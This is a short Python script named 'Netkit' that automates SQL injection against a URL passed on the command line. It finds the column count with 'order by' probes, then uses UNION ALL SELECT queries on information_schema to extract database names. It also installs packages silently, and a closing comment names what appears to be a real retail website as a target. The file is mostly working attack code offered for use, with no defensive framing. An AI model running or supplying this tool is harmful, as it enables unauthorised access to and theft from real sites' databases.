#!/bin/python3

import requests
from subprocess import check_output as out, call
from sys import argv, exit
from time import sleep

try:
    out("which pip3", shell=True)
except:
    call("apt install pip3", shell=True)
try:
    out("which lolcat", shell=True)
except:
    call("pip3 install lolcat", shell=True)

icon = ("""

███╗   ██╗███████╗████████╗██╗  ██╗██╗████████╗
████╗  ██║██╔════╝╚══██╔══╝██║ ██╔╝██║╚══██╔══╝
██╔██╗ ██║█████╗     ██║   █████╔╝ ██║   ██║   
██║╚██╗██║██╔══╝     ██║   ██╔═██╗ ██║   ██║   
██║ ╚████║███████╗   ██║   ██║  ██╗██║   ██║   
╚═╝  ╚═══╝╚══════╝   ╚═╝   ╚═╝  ╚═╝╚═╝   ╚═╝   
                                               

""")

call(f"echo '''{icon}''' | lolcat", shell=True)
del icon
if len(argv) == 1:
    print("Netkit: missing arguments")
    exit()

def separa(char1: str, char2 : str) -> str :
    None
r = ""
n = 1
print("\033[01;32m[+]\033[0;0m\033[01;39mStarting\033[0;0m")
while not "warning: mysql" in r.lower() and not "Unknown column" in r:
     try:
        r = requests.get(f"{argv[1]} order by {n} --").text
        # tirar mod_security
        #generated by Mod_Security
     except KeyboardInterrupt:
        exit()
     except requests.exceptions.MissingSchema:
        print("Netkit: invalid url")
        exit()
     except:
        None
     sleep(0.05)
     n += 1
     print(n)
n -= 2
print(f"\033[01;32m[+]\033[0;0m\033[01;39m{n} columns\033[0;0m")

if "--dbs" in argv:
    dbs = ['']
    new = []
    for i in range(n):
        algr = []
        for j in range(n):
            algr.append(f"CONCAT(UPPER('x{i}tikten0x'), table_schema, UPPER('x0tikten{i}x'))")
        algr = ",".join(algr)
        for j in dbs:
            new.append(f"table_schema != '{j}'")
        new = " AND ".join(new)
        r = requests.get(f"{argv[1]} union all select {algr} from information_schema.tables where {new} --")
        r = r.text
        try:
            co = r.index(f"X{i}TIKTEN0X")+len(f"X{i}TIKTEN0X")
            fi = r.index(f"X0TIKTEN{i}X")
        except:
            break
        dbs.append(r[co:fi])
        new = []
    dbs = "\n".join(set(dbs))
    print(dbs)
#http://adessocasa.com.br/site/1.5/pag_produtos_loja.php?id=18&&idfornecedor=1
 
